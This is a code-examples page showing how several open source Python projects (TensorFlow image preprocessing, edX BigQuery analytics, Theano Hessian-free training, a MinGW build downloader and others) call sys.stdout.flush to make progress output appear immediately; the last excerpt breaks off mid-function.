sys.stdout.flush

Here are examples of the Python API sys.stdout.flush taken from open source projects. Each example shows how a real codebase flushes standard output, typically to make progress and log messages appear immediately.

156 Examples
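
Before the project examples, a minimal standalone sketch (not taken from any project below) shows the usual reason for calling sys.stdout.flush(): standard output is typically line- or block-buffered, so partial lines such as progress ticks may not appear until the buffer fills unless they are flushed explicitly.

import sys
import time

def show_progress(total=10):
    """Print one dot per unit of work, all on a single line."""
    for _ in range(total):
        sys.stdout.write(".")
        sys.stdout.flush()  # push the dot out now; stdout may be block-buffered
        time.sleep(0.1)     # stand-in for a unit of real work
    print(" done")

if __name__ == "__main__":
    show_progress()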

Example 1

Project: AI_Reader Source File: build_image_data.py
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               texts, labels, num_shards):
  """Processes and saves list of images as TFRecord in 1 thread.

  Args:
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch index within [0, len(ranges)).
    ranges: list of pairs of integers specifying the range of each batch to
      analyze in parallel.
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    texts: list of strings; each string is human readable, e.g. 'dog'
    labels: list of integers; each integer identifies the ground truth
    num_shards: integer number of shards for this data set.
  """
  # Each thread produces N shards where N = int(num_shards / num_threads).
  # For instance, if num_shards = 128 and num_threads = 2, then the first
  # thread would produce shards [0, 64).
  num_threads = len(ranges)
  assert not num_shards % num_threads
  num_shards_per_batch = int(num_shards / num_threads)

  shard_ranges = np.linspace(ranges[thread_index][0],
                             ranges[thread_index][1],
                             num_shards_per_batch + 1).astype(int)
  num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

  counter = 0
  for s in xrange(num_shards_per_batch):
    # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
    shard = thread_index * num_shards_per_batch + s
    output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
    output_file = os.path.join(FLAGS.output_directory, output_filename)
    writer = tf.python_io.TFRecordWriter(output_file)

    shard_counter = 0
    files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
    for i in files_in_shard:
      filename = filenames[i]
      label = labels[i]
      text = texts[i]

      image_buffer, height, width = _process_image(filename, coder)

      example = _convert_to_example(filename, image_buffer, label,
                                    text, height, width)
      writer.write(example.SerializeToString())
      shard_counter += 1
      counter += 1

      if not counter % 1000:
        print('%s [thread %d]: Processed %d of %d images in thread batch.' %
              (datetime.now(), thread_index, counter, num_files_in_thread))
        sys.stdout.flush()

    print('%s [thread %d]: Wrote %d images to %s' %
          (datetime.now(), thread_index, shard_counter, output_file))
    sys.stdout.flush()
    shard_counter = 0
  print('%s [thread %d]: Wrote %d images to %d shards.' %
        (datetime.now(), thread_index, counter, num_files_in_thread))
  sys.stdout.flush()

Example 2

Project: edx2bigquery Source File: make_person_course_day.py
def process_course(course_id, force_recompute=False, use_dataset_latest=False, end_date=None, 
                   check_dates=True, skip_last_day=False):
    '''
    Make {course_id}.person_course_day table for specified course_id.

    This is a single course-specific table, which contains all day's data.
    It is incrementally updated when new tracking logs data comes in,
    by appending rows to the end.  The rows are kept in time order.

    check_dates is disregarded.

    If skip_last_day is True then do not include the last day of tracking log data
    in the processing.  This is done to avoid processing partial data, e.g. when
    tracking log data are incrementally loaded with a delta of less than one day.
    '''

    dataset = bqutil.course_id2dataset(course_id, use_dataset_latest=use_dataset_latest)

    videoTableExists = False
    try:

        tinfo_video = bqutil.get_bq_table_info(dataset, 'video_stats_day')
        assert tinfo_video is not None, "Video stats table missing... Not including video stats"
        videoTableExists = True

    except (AssertionError, Exception) as err:
        #print " --> Err: missing %s.%s?  Skipping creation of chapter_grades" % (dataset, "course_axis")
        sys.stdout.flush()
        pass
        #return

    forumTableExists = False
    try:

        tinfo_forum = bqutil.get_bq_table_info(dataset, 'forum_events')
        assert tinfo_forum is not None, "Forum events table missing... Not including forum stats"
        forumTableExists = True

    except (AssertionError, Exception) as err:
        #print " --> Err: missing %s.%s?  Skipping creation of chapter_grades" % (dataset, "course_axis")
        sys.stdout.flush()
        pass
        #return

    problemTableExists = False
    try:

        tinfo_personproblem = bqutil.get_bq_table_info(dataset, 'person_problem')
        tinfo_courseproblem = bqutil.get_bq_table_info(dataset, 'course_problem')
        tinfo_courseaxis = bqutil.get_bq_table_info(dataset, 'course_axis')
        tinfo_personcourse = bqutil.get_bq_table_info(dataset, 'person_course')
        # Check that the person problem, course problem, course axis, and person course tables exist
        assert tinfo_personproblem is not None, "Person problem table missing... Not including problem stats"
        assert tinfo_courseproblem is not None, "Course problem table missing... Not including problem stats"
        assert tinfo_courseaxis is not None, "Course axis table missing... Not including problem stats"
        assert tinfo_personcourse is not None, "Person Course table missing... Not including problem stats"
        problemTableExists = True

    except (AssertionError, Exception) as err:
        #print " --> Err: missing %s.%s?  Skipping creation of chapter_grades" % (dataset, "course_axis")
        sys.stdout.flush()
        pass

    PCDAY_SQL_BASE_SELECT = """
			  SELECT username,
				 '{course_id}' AS course_id,
				 DATE(time) AS date,
				 SUM(bevent) AS nevents,
				 SUM(bprogress) AS nprogcheck,
				 SUM(bshow_answer) AS nshow_answer,
				 SUM(bvideo) AS nvideo,
				 SUM(bproblem_check) AS nproblem_check,
				 SUM(bforum) AS nforum,
				 SUM(bshow_transcript) AS ntranscript,
				 SUM(bseq_goto) AS nseq_goto,
				 SUM(bseek_video) AS nseek_video,
				 SUM(bpause_video) AS npause_video,
		    """

    PCDAY_SQL_VIDEO_EXISTS = """
			  	 COUNT(DISTINCT video_id) AS nvideos_viewed, # New Video - Unique videos viewed
				 SUM(case when position is not null then FLOAT(position) else FLOAT(0.0) end) AS nvideos_watched_sec, # New Video - # sec watched using max video position
		    """

    PCDAY_SQL_VIDEO_DNE = """
				 0 AS nvideos_viewed, # New Video - Unique videos viewed
				 FLOAT(0.0) AS nvideos_watched_sec, # New Video - # sec watched using max video position
		    """
    PCDAY_SQL_VIDEO_SELECT = PCDAY_SQL_VIDEO_EXISTS if videoTableExists else PCDAY_SQL_VIDEO_DNE

    PCDAY_SQL_FORUM_EXISTS = """
				 SUM(case when read is not null then read else 0 end) AS nforum_reads, # New discussion - Forum reads
				 SUM(case when write is not null then write else 0 end) AS nforum_posts, # New discussion - Forum posts
				 COUNT(DISTINCT thread_id ) AS nforum_threads, # New discussion - Unique forum threads interacted with
		    """

    PCDAY_SQL_FORUM_DNE = """
				 0 AS nforum_reads, # New discussion - Forum reads
				 0 AS nforum_posts, # New discussion - Forum posts
				 0 AS nforum_threads, # New discussion - Unique forum threads interacted with
		    """
    PCDAY_SQL_FORUM_SELECT = PCDAY_SQL_FORUM_EXISTS if forumTableExists else PCDAY_SQL_FORUM_DNE

    PCDAY_SQL_PROBLEM_EXISTS = """
				 COUNT(DISTINCT problem_nid ) AS nproblems_answered, # New Problem - Unique problems attempted
				 SUM(case when n_attempts is not null then n_attempts else 0 end) AS nproblems_attempted, # New Problem - Total attempts
				 SUM(case when ncount_problem_multiplechoice is not null then ncount_problem_multiplechoice else 0 end) as nproblems_multiplechoice,
				 SUM(case when ncount_problem_choice is not null then ncount_problem_choice else 0 end) as nproblems_choice,
				 SUM(case when ncount_problem_numerical is not null then ncount_problem_numerical else 0 end) as nproblems_numerical,
				 SUM(case when ncount_problem_option is not null then ncount_problem_option else 0 end) as nproblems_option,
				 SUM(case when ncount_problem_custom is not null then ncount_problem_custom else 0 end) as nproblems_custom,
				 SUM(case when ncount_problem_string is not null then ncount_problem_string else 0 end) as nproblems_string,
				 SUM(case when ncount_problem_mixed is not null then ncount_problem_mixed else 0 end) as nproblems_mixed,
				 SUM(case when ncount_problem_formula is not null then ncount_problem_formula else 0 end) as nproblems_forumula,
				 SUM(case when ncount_problem_other is not null then ncount_problem_other else 0 end) as nproblems_other,
		    """

    PCDAY_SQL_PROBLEM_DNE = """
				 0 AS nproblems_answered, # New Problem - Unique problems attempted
				 0 AS nproblems_attempted, # New Problem - Total attempts
				 0 AS nproblems_multiplechoice,
				 0 AS nproblems_choice,
				 0 AS nproblems_numerical,
				 0 AS nproblems_option,
				 0 AS nproblems_custom,
				 0 AS nproblems_string,
				 0 AS nproblems_mixed,
				 0 AS nproblems_forumula,
				 0 AS nproblems_other,
		    """
    PCDAY_SQL_PROBLEM_SELECT = PCDAY_SQL_PROBLEM_EXISTS if problemTableExists else PCDAY_SQL_PROBLEM_DNE

    PCDAY_SQL_MID = """
				 MAX(time) AS last_event,
				 AVG( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS avg_dt,
				 STDDEV( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS sdv_dt,
				 MAX( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS max_dt,
				 COUNT( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS n_dt,
				 SUM( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS sum_dt
			FROM (
			  SELECT
			    *
			  FROM (
			    SELECT
			      username,
			      CASE WHEN event_type = "play_video" THEN 1 ELSE 0 END AS bvideo,
			      CASE WHEN event_type = "problem_check" THEN 1 ELSE 0 END AS bproblem_check,
			      CASE WHEN username != "" THEN 1 ELSE 0 END AS bevent,
			      CASE WHEN REGEXP_MATCH(event_type, "^/courses/{course_id}/discussion/.*") then 1 else 0 end as bforum,
			      CASE WHEN REGEXP_MATCH(event_type, "^/courses/{course_id}/progress") then 1 else 0 end as bprogress,
			      CASE WHEN event_type IN ("show_answer",
				"showanswer") THEN 1 ELSE 0 END AS bshow_answer,
			      CASE WHEN event_type = 'show_transcript' THEN 1 ELSE 0 END AS bshow_transcript,
			      CASE WHEN event_type = 'seq_goto' THEN 1 ELSE 0 END AS bseq_goto,
			      CASE WHEN event_type = 'seek_video' THEN 1 ELSE 0 END AS bseek_video,
			      CASE WHEN event_type = 'pause_video' THEN 1 ELSE 0 END AS bpause_video,
			      # case when event_type = 'edx.course.enrollment.activated' then 1 else 0 end as benroll,
			      # case when event_type = 'edx.course.enrollment.deactivated' then 1 else 0 end as bunenroll
			      time,
			      LAG(time, 1) OVER (PARTITION BY username ORDER BY time) last_time
			    FROM {DATASETS}
			    WHERE
			      NOT event_type CONTAINS "/xblock/"
			      AND username != "" )
		    """


    PCDAY_SQL_VIDEO = """ ,
			  ( # Video events
				  SELECT TIMESTAMP(date) as time,
				         '{course_id}' as course_id,
				         username,
				         video_id,
				         position,
				  FROM [{dataset}.video_stats_day]
				  WHERE TIMESTAMP(date)>= TIMESTAMP("{min_date_start}") and TIMESTAMP(date) <= TIMESTAMP("{max_date_end}")

			  )
                      """
    PCDAY_SQL_ADD = PCDAY_SQL_VIDEO if videoTableExists else ''

    PCDAY_SQL_FORUM = """ ,
			  ( # Forum Events
				   SELECT time,
					  username,
				          '{course_id}' as course_id,
				          thread_id,
				          (CASE WHEN (forum_action == "reply" or forum_action == "comment_reply"
						      or forum_action == "created_thread" or forum_action == "created_response" or forum_action == "created_comment")
						THEN 1 ELSE 0 END) AS write,
					  (CASE WHEN (forum_action == "read" or forum_action == "read_inline") THEN 1 ELSE 0 END) AS read,
				   FROM [{dataset}.forum_events]
				   WHERE (forum_action == "reply" or forum_action == "comment_reply"
					  or forum_action == "created_thread" or forum_action == "created_response" or forum_action == "created_comment"
					  or forum_action == "read" or forum_action == "read_inline")
				          and ( time >= TIMESTAMP("{min_date_start}") and time <= TIMESTAMP("{max_date_end}") )
			  )
                      """
    PCDAY_SQL_ADD = PCDAY_SQL_ADD + PCDAY_SQL_FORUM if forumTableExists else PCDAY_SQL_ADD

    PCDAY_SQL_PROBLEM = """,
			  ( # Problems
				   SELECT pc.username AS username,
				          pp.problem_nid AS problem_nid,
				          pp.n_attempts AS n_attempts,
				          pp.time AS time,
				          '{course_id}' as course_id,
					  pp.ncount_problem_multiplechoice as ncount_problem_multiplechoice,
					  pp.ncount_problem_choice as ncount_problem_choice,
					  pp.ncount_problem_numerical as ncount_problem_numerical,
					  pp.ncount_problem_option as ncount_problem_option,
					  pp.ncount_problem_custom as ncount_problem_custom,
					  pp.ncount_problem_string as ncount_problem_string,
					  pp.ncount_problem_mixed as ncount_problem_mixed,
					  pp.ncount_problem_formula as ncount_problem_formula,
					  pp.ncount_problem_other as ncount_problem_other,
				   FROM (

					   (
					      SELECT PP.user_id as user_id,
						     PP.problem_nid AS problem_nid,
						     PP.n_attempts as n_attempts,
						     PP.date as time,
						     (Case when CP_CA.data_itype == "multiplechoiceresponse" then 1 else 0 end) as ncount_problem_multiplechoice, # Choice
					             (Case when CP_CA.data_itype == "choiceresponse" then 1 else 0 end) as ncount_problem_choice,       # Choice
						     (Case when CP_CA.data_itype == "numericalresponse" then 1 else 0 end) as ncount_problem_numerical, #input
						     (Case when CP_CA.data_itype == "optionresponse" then 1 else 0 end) as ncount_problem_option,       # Choice
					             (Case when CP_CA.data_itype == "customresponse" then 1 else 0 end) as ncount_problem_custom,       # Custom
					             (Case when CP_CA.data_itype == "stringresponse" then 1 else 0 end) as ncount_problem_string,       # Input
					             (Case when CP_CA.data_itype == "mixed" then 1 else 0 end) as ncount_problem_mixed,                 # Mixed
					             (Case when CP_CA.data_itype == "forumula" then 1 else 0 end) as ncount_problem_formula,            # Input
					             (Case when CP_CA.data_itype != "multiplechoiceresponse" and
							        CP_CA.data_itype != "choiceresponse" and
							        CP_CA.data_itype != "numericalresponse" and
							        CP_CA.data_itype != "optionresponse" and
							        CP_CA.data_itype != "customresponse" and
							        CP_CA.data_itype != "stringresponse" and
							        CP_CA.data_itype != "mixed" and
							        CP_CA.data_itype != "forumula"
							   then 1 else 0 end) as ncount_problem_other, # Input
						     #MAX(n_attempts) AS n_attempts,
						     #MAX(date) AS time,
					      FROM [{dataset}.person_problem] PP
					      LEFT JOIN
					      (
							SELECT CP.problem_nid as problem_nid,
							       INTEGER(CP.problem_id) as problem_id,
							       CA.data.itype as data_itype,
						        FROM [{dataset}.course_problem] CP
						        LEFT JOIN [{dataset}.course_axis] CA
						        ON CP.problem_id == CA.url_name
					      ) as CP_CA
					      ON PP.problem_nid == CP_CA.problem_nid
					      GROUP BY time, user_id, problem_nid, n_attempts,
						       ncount_problem_multiplechoice,
						       ncount_problem_choice,
						       ncount_problem_choice,
						       ncount_problem_numerical,
						       ncount_problem_option,
						       ncount_problem_custom,
						       ncount_problem_string,
						       ncount_problem_mixed,
						       ncount_problem_formula,
						       ncount_problem_other
					      )

					      #FROM [{dataset}.person_item] PI
					      #JOIN [{dataset}.course_item] CI
					      #ON PI.item_nid = CI.item_nid
					      #GROUP BY user_id,
						       #problem_nid
					      #ORDER BY
						       #user_id,
						       #problem_nid
					) AS pp
				        LEFT JOIN (
							      SELECT username,
								     user_id
							      FROM [{dataset}.person_course] 
					) AS pc
					ON pc.user_id = pp.user_id
				        WHERE time >= TIMESTAMP("{min_date_start}") and time <= TIMESTAMP("{max_date_end}")
			  )
 
                        """
    PCDAY_SQL_ADD = PCDAY_SQL_ADD + PCDAY_SQL_PROBLEM if problemTableExists else PCDAY_SQL_ADD

    PCDAY_SQL_END = """
			  )
			  WHERE time > TIMESTAMP("{last_date}")
			  GROUP BY course_id,
				   username,
				   date
			  ORDER BY date
		    """


    PCDAY_SQL_NEW = PCDAY_SQL_BASE_SELECT + PCDAY_SQL_VIDEO_SELECT + PCDAY_SQL_FORUM_SELECT + PCDAY_SQL_PROBLEM_SELECT + PCDAY_SQL_MID + PCDAY_SQL_ADD + PCDAY_SQL_END

    PCDAY_SQL = PCDAY_SQL_NEW.format( dataset=dataset, course_id="{course_id}", DATASETS="{DATASETS}", last_date="{last_date}", min_date_start="{min_date_start}", max_date_end="{max_date_end}")

    table = 'person_course_day'

    def gdf(row):
        return datetime.datetime.strptime(row['date'], '%Y-%m-%d')

    print "=== Processing person_course_day for %s (start %s)"  % (course_id, datetime.datetime.now())
    sys.stdout.flush()

    # Major person_course_day schema revision 19-Jan-2016 adds new fields; if table exists, ensure it 
    # has new schema, else force recompute.
    try:
        tinfo = bqutil.get_bq_table_info(dataset, table)
    except Exception as err:
        tinfo = None
    if tinfo:
        fields = tinfo['schema']['fields']
        field_names = [x['name'] for x in fields]
        if not 'nvideos_viewed' in field_names:
            cdt = tinfo['creationTime']
            print "    --> person_course_day created %s; missing nvideos_viewed field in schema; forcing recompute - this may take a long time!" % cdt
            sys.stdout.flush()
            force_recompute = True

    process_tracking_logs.run_query_on_tracking_logs(PCDAY_SQL, table, course_id, force_recompute=force_recompute,
                                                     use_dataset_latest=use_dataset_latest,
                                                     end_date=end_date,
                                                     get_date_function=gdf,
                                                     newer_than=datetime.datetime( 2016, 1, 19, 22, 30 ),
                                                     skip_last_day=skip_last_day)
    
    print "Done with person_course_day for %s (end %s)"  % (course_id, datetime.datetime.now())
    print "="*77
    sys.stdout.flush()

Example 3

Project: theano-hf Source File: hf.py
  def train(self, gradient_dataset, cg_dataset, initial_lambda=0.1, mu=0.03, global_backtracking=False, preconditioner=False, max_cg_iterations=250, num_updates=100, validation=None, validation_frequency=1, patience=numpy.inf, save_progress=None):
    '''Performs HF training.

  gradient_dataset : SequenceDataset-like object
      Defines batches used to compute the gradient.
      The `iterate(update=True)` method should yield shuffled training examples
      (tuples of variables matching your graph inputs).
      The same examples MUST be returned between multiple calls to iterate(),
      unless update is True, in which case the next batch should be different.
  cg_dataset : SequenceDataset-like object
      Defines batches used to compute CG iterations.
  initial_lambda : float
      Initial value of the Tikhonov damping coefficient.
  mu : float
      Coefficient for structural damping.
  global_backtracking : Boolean
      If True, backtracks as much as necessary to find the global minimum among
      all CG iterates. Else, Martens' heuristic is used.
  preconditioner : Boolean
      Whether to use Martens' preconditioner.
  max_cg_iterations : int
      CG stops after this many iterations regardless of the stopping criterion.
  num_updates : int
      Training stops after this many parameter updates regardless of `patience`.
  validation: SequenceDataset object, (lambda : tuple) callback, or None
      If a SequenceDataset object is provided, the training monitoring costs
      will be evaluated on that validation dataset.
      If a callback is provided, it should return a list of validation costs
      for monitoring, the first of which is also used for early stopping.
      If None, no early stopping or validation monitoring is performed.
  validation_frequency: int
      Validation is performed every `validation_frequency` updates.
  patience: int
      Training stops after `patience` updates without improvement in validation
      cost.
  save_progress: string or None
      A checkpoint is automatically saved at this location after each update.
      Call the `train` function again with the same parameters to resume
      training.'''

    self.lambda_ = initial_lambda
    self.mu = mu
    self.global_backtracking = global_backtracking
    self.cg_dataset = cg_dataset
    self.preconditioner = preconditioner
    self.max_cg_iterations = max_cg_iterations
    best = [0, numpy.inf, None]  # iteration, cost, params
    first_iteration = 1

    if isinstance(save_progress, str) and os.path.isfile(save_progress):
      save = cPickle.load(file(save_progress))
      self.cg_last_x, best, self.lambda_, first_iteration, init_p = save
      first_iteration += 1
      for i, j in zip(self.p, init_p): i.set_value(j)
      print '* recovered saved model'
    
    try:
      for u in xrange(first_iteration, 1 + num_updates):
        print 'update %i/%i,' % (u, num_updates),
        sys.stdout.flush()

        gradient = numpy.zeros(sum(self.sizes), dtype=theano.config.floatX)
        costs = []
        for inputs in gradient_dataset.iterate(update=True):
          result = self.f_gc(*inputs)
          gradient += self.list_to_flat(result[:len(self.p)]) / gradient_dataset.number_batches
          costs.append(result[len(self.p):])

        print 'cost=', numpy.mean(costs, axis=0),
        print 'lambda=%.5f,' % self.lambda_,
        sys.stdout.flush()

        after_cost, flat_delta, backtracking, num_cg_iterations = self.cg(-gradient)
        delta_cost = numpy.dot(flat_delta, gradient + 0.5*self.batch_Gv(flat_delta, lambda_=0))  # disable damping
        before_cost = self.quick_cost()
        for i, delta in zip(self.p, self.flat_to_list(flat_delta)):
          i.set_value(i.get_value() + delta)
        cg_dataset.update()

        rho = (after_cost - before_cost) / delta_cost  # Levenberg-Marquardt
        #print 'rho=%f' %rho,
        if rho < 0.25:
          self.lambda_ *= 1.5
        elif rho > 0.75:
          self.lambda_ /= 1.5
        
        if validation is not None and u % validation_frequency == 0:
          if hasattr(validation, 'iterate'):
            costs = numpy.mean([self.f_cost(*i) for i in validation.iterate()], axis=0)
          elif callable(validation):
            costs = validation()
          print 'validation=', costs,
          if costs[0] < best[1]:
            best = u, costs[0], [i.get_value().copy() for i in self.p]
            print '*NEW BEST',

        if isinstance(save_progress, str):
          # do not save dataset states
          save = self.cg_last_x, best, self.lambda_, u, [i.get_value().copy() for i in self.p]
          cPickle.dump(save, file(save_progress, 'wb'), cPickle.HIGHEST_PROTOCOL)
        
        if u - best[0] > patience:
          print 'PATIENCE ELAPSED, BAILING OUT'
          break
        
        print
        sys.stdout.flush()
    except KeyboardInterrupt:
      print 'Interrupted by user.'
    
    if best[2] is None:
      best[2] = [i.get_value().copy() for i in self.p]
    return best[2]

Example 4

Project: prettytensor Source File: local_trainer.py
  def run_model(self,
                op_list,
                num_steps,
                feed_vars=(),
                feed_data=None,
                print_every=100,
                allow_initialize=True):
    """Runs `op_list` for `num_steps`.

    Args:
      op_list: A list of ops to run.
      num_steps: Number of steps to run this for.  If feeds are used, this is a
        maximum.
      feed_vars: The variables to feed.
      feed_data: An iterator that feeds data tuples.
      print_every: Print a log line and checkpoint every `print_every` steps.
      allow_initialize: If True, the model will be initialized if any variable
        is uninitialized; if False, the model will not be initialized.
    Returns:
      The final run result as a list.
    Raises:
      ValueError: If feed_data doesn't match feed_vars.
    """
    feed_data = feed_data or itertools.repeat(())

    ops = [bookkeeper.global_step()]
    ops.extend(op_list)

    sess = tf.get_default_session()
    self.prepare_model(sess, allow_initialize=allow_initialize)
    results = []
    try:
      for i, data in zip(xrange(num_steps), feed_data):
        log_this_time = print_every and i % print_every == 0
        if len(data) != len(feed_vars):
          raise ValueError(
              'feed_data and feed_vars must be the same length: %d vs %d' % (
                  len(data), len(feed_vars)))
        if self._coord.should_stop():
          print('Coordinator stopped')
          sys.stdout.flush()
          self.stop_queues()
          break
        if len(feed_vars) != len(data):
          raise ValueError('Feed vars must be the same length as data.')

        if log_this_time and self._summary_writer:
          results = sess.run(ops + [self._summaries],
                             dict(zip(feed_vars, data)))
          self._summary_writer.add_summary(results[-1], results[0])
          results = results[:-1]
        else:
          results = sess.run(ops, dict(zip(feed_vars, data)))
        if log_this_time:
          self._log_and_save(sess, results)

      # Print the last line if it wasn't just printed
      if print_every and not log_this_time:
        self._log_and_save(sess, results)
    except tf.errors.OutOfRangeError as ex:
      print('Done training -- epoch limit reached %s' % ex)
      sys.stdout.flush()
      self.stop_queues()
    except BaseException as ex:
      print('Exception -- stopping threads: %s' % ex, file=sys.stderr)
      sys.stdout.flush()
      self.stop_queues()
      raise
    return results

Example 5

Project: COMMIT Source File: core.py
    def save_results( self, path_suffix = None ) :
        """Save the output (coefficients, errors, maps etc).

        Parameters
        ----------
        path_suffix : string
            Text to be appended to "Results" to create the output path (default : None)
        """
        if self.x is None :
            raise RuntimeError( 'Model not fitted to the data; call "fit()" first.' )

        RESULTS_path = 'Results_' + self.model.id
        if path_suffix :
            self.set_config('path_suffix', path_suffix)
            RESULTS_path = RESULTS_path +'_'+ path_suffix

        print '\n-> Saving results to "%s/*":' % RESULTS_path
        tic = time.time()

        # create folder or delete existing files (if any)
        RESULTS_path = pjoin( self.get_config('TRACKING_path'), RESULTS_path )
        if not exists( RESULTS_path ) :
            makedirs( RESULTS_path )
        else :
            for f in glob.glob( pjoin(RESULTS_path,'*') ) :
                remove( f )
        self.set_config('RESULTS_path', RESULTS_path)

        # Configuration and results
        print '\t* configuration and results...',
        sys.stdout.flush()
        nF = self.DICTIONARY['IC']['nF']
        nE = self.DICTIONARY['EC']['nE']
        nV = self.DICTIONARY['nV']
        # x is the x of the original problem
        # self.x is the x preconditioned
        # x_map is the x used to generate the intra-cellular, extra-cellular and isotropic maps (not divided by norm of the fiber)
        if self.get_config('doNormalizeKernels') :
            # renormalize the coefficients
            norm1 = np.repeat(self.KERNELS['wmr_norm'],nF)
            norm2 = np.repeat(self.KERNELS['wmh_norm'],nE)
            norm3 = np.repeat(self.KERNELS['iso_norm'],nV)
            norm_fib = np.kron(np.ones(self.KERNELS['wmr'].shape[0]), self.DICTIONARY['TRK']['norm'])
            x_map = self.x / np.hstack( (norm1,norm2,norm3) )
            x = self.x / np.hstack( (norm1*norm_fib,norm2,norm3) )
        else :
            x_map = self.x
            x = self.x
        with open( pjoin(RESULTS_path,'results.pickle'), 'wb+' ) as fid :
            cPickle.dump( [self.CONFIG, self.x, x], fid, protocol=2 )
        print '[ OK ]'

        # Map of voxelwise errors
        print '\t* fitting errors:'

        niiMAP_img = np.zeros( self.get_config('dim'), dtype=np.float32 )
        affine = self.niiDWI.affine if nibabel.__version__ >= '2.0.0' else self.niiDWI.get_affine()
        niiMAP     = nibabel.Nifti1Image( niiMAP_img, affine )
        niiMAP_hdr = niiMAP.header if nibabel.__version__ >= '2.0.0' else niiMAP.get_header()

        y_mea = np.reshape( self.niiDWI_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'], : ].flatten().astype(np.float32), (nV,-1) )
        y_est = np.reshape( self.A.dot(self.x), (nV,-1) ).astype(np.float32)

        print '\t\t- RMSE...',
        sys.stdout.flush()
        tmp = np.sqrt( np.mean((y_mea-y_est)**2,axis=1) )
        niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = tmp
        niiMAP_hdr['cal_min'] = 0
        niiMAP_hdr['cal_max'] = tmp.max()
        nibabel.save( niiMAP, pjoin(RESULTS_path,'fit_RMSE.nii.gz') )
        print ' [ %.3f +/- %.3f ]' % ( tmp.mean(), tmp.std() )

        print '\t\t- NRMSE...',
        sys.stdout.flush()
        tmp = np.sum(y_mea**2,axis=1)
        idx = np.where( tmp < 1E-12 )
        tmp[ idx ] = 1
        tmp = np.sqrt( np.sum((y_mea-y_est)**2,axis=1) / tmp )
        tmp[ idx ] = 0
        niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = tmp
        niiMAP_hdr['cal_min'] = 0
        niiMAP_hdr['cal_max'] = 1
        nibabel.save( niiMAP, pjoin(RESULTS_path,'fit_NRMSE.nii.gz') )
        print '[ %.3f +/- %.3f ]' % ( tmp.mean(), tmp.std() )

        # Map of compartment contributions
        print '\t* voxelwise contributions:'

        print '\t\t- intra-axonal',
        sys.stdout.flush()
        niiMAP_img[:] = 0
        if len(self.KERNELS['wmr']) > 0 :
            offset = nF * self.KERNELS['wmr'].shape[0]
            tmp = x_map[:offset].reshape( (-1,nF) ).sum( axis=0 )
            xv = np.bincount( self.DICTIONARY['IC']['v'], minlength=nV,
                weights=tmp[ self.DICTIONARY['IC']['fiber'] ] * self.DICTIONARY['IC']['len']
            ).astype(np.float32)
            niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = xv
        nibabel.save( niiMAP, pjoin(RESULTS_path,'compartment_IC.nii.gz') )
        print '[ OK ]'

        print '\t\t- extra-axonal',
        sys.stdout.flush()
        niiMAP_img[:] = 0
        if len(self.KERNELS['wmh']) > 0 :
            offset = nF * self.KERNELS['wmr'].shape[0]
            tmp = x_map[offset:offset+nE*len(self.KERNELS['wmh'])].reshape( (-1,nE) ).sum( axis=0 )
            xv = np.bincount( self.DICTIONARY['EC']['v'], weights=tmp, minlength=nV ).astype(np.float32)
            niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = xv
        nibabel.save( niiMAP, pjoin(RESULTS_path,'compartment_EC.nii.gz') )
        print '[ OK ]'

        print '\t\t- isotropic',
        sys.stdout.flush()
        niiMAP_img[:] = 0
        if len(self.KERNELS['iso']) > 0 :
            offset = nF * self.KERNELS['wmr'].shape[0] + nE * self.KERNELS['wmh'].shape[0]
            xv = x_map[offset:].reshape( (-1,nV) ).sum( axis=0 )
            niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = xv
        nibabel.save( niiMAP, pjoin(RESULTS_path,'compartment_ISO.nii.gz') )
        print '   [ OK ]'

        print '   [ %.1f seconds ]' % ( time.time() - tic )

Example 6

Project: buildtools-BaseTools Source File: mingw-gcc-build.py
Function: get_all
    def GetAll(self):

        def progress(received, blockSize, fileSize):
            if fileSize < 0: return
            wDots = (100 * received * blockSize) / fileSize / 10
            if wDots > self.dots:
                for i in range(wDots - self.dots):
                    print '.',
                    sys.stdout.flush()
                    self.dots += 1

        maxRetries = 1
        for (fname, fdata) in self.source_files.items():
            for retries in range(maxRetries):
                try:
                    self.dots = 0
                    local_file = os.path.join(self.config.src_dir, fdata['filename'])
                    url = fdata['url']
                    print 'Downloading %s:' % fname, url
                    if retries > 0:
                        print '(retry)',
                    sys.stdout.flush()

                    completed = False
                    if os.path.exists(local_file):
                        md5_pass = self.checkHash(fdata)
                        if md5_pass:
                            print '[md5 match]',
                        else:
                            print '[md5 mismatch]',
                        sys.stdout.flush()
                        completed = md5_pass

                    if not completed:
                        urllib.urlretrieve(url, local_file, progress)

                    #
                    # BUGBUG: Suggest proxy to user if download fails.
                    #
